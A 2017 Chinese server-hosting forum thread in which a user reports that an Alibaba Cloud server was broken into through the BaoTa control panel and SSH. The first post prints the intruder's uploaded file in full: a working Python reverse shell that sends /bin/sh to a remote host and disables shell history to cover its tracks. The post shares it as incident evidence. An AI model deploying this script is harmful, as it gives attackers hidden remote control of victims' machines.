全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 2123|回复: 5
打印 上一主题 下一主题

有台阿里云被疑似论坛MJJ的人给爆破了 @modianxia

[复制链接]
跳转到指定楼层
1#
发表于 2017-1-20 10:11:06 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
难道是宝塔的bug?
他先登陆了宝塔 然后建了个b.py
但是宝塔我都更改了默认用户名的 他还是用admin登陆成功了
然后登陆了ssh 我正准备睡觉呢 收到了阿里云的通知 我就先关机了
py内容

  1. # -*- coding:utf-8 -*-
  2. #!/usr/bin/env python
  3. """
  4. back connect py version,only linux have pty module
  5. code by google security team
  6. """
  7. import sys,os,socket,pty
  8. shell = "/bin/sh"
  9. def usage(name):
  10.     print 'python reverse connector'
  11.     print 'usage: %s <ip_addr> <port>' % name

  12. def main():
  13.     if len(sys.argv) < 3:
  14.         usage(sys.argv[0])
  15.         sys.exit()
  16.     s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  17.     try:
  18.         if sys.argv[3] == 'udp' :
  19.             s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
  20.     except:pass
  21.     try:
  22.         s.connect((sys.argv[1],int(sys.argv[2])))
  23.         print 'connect ok'
  24.     except:
  25.         print 'connect faild'
  26.         sys.exit()
  27.     os.dup2(s.fileno(),0)
  28.     os.dup2(s.fileno(),1)
  29.     os.dup2(s.fileno(),2)
  30.     global shell
  31.     os.unsetenv("HISTFILE")
  32.     os.unsetenv("HISTFILESIZE")
  33.     os.unsetenv("HISTSIZE")
  34.     os.unsetenv("HISTORY")
  35.     os.unsetenv("HISTSAVE")
  36.     os.unsetenv("HISTZONE")
  37.     os.unsetenv("HISTLOG")
  38.     os.unsetenv("HISTCMD")
  39.     os.putenv("HISTFILE",'/dev/null')
  40.     os.putenv("HISTSIZE",'0')
  41.     os.putenv("HISTFILESIZE",'0')
  42.     pty.spawn(shell)
  43.     s.close()

  44. if __name__ == '__main__':
  45.     main()
复制代码

阿里云
loc.jpg (15.63 KB, 下载次数: 2)
2#
发表于 2017-1-20 10:22:28 | 只看该作者
是哪个mjj这么厉害
4#
发表于 2017-1-20 13:58:40 | 只看该作者
楼下对此事负责
5#
发表于 2017-1-20 14:08:24 | 只看该作者
宝塔用完了我一般都是删面板..
6#
发表于 2017-1-20 16:07:28 | 只看该作者
测试到mjj的机器了,哈哈
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-6-24 10:19 , Processed in 0.129792 second(s), 12 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表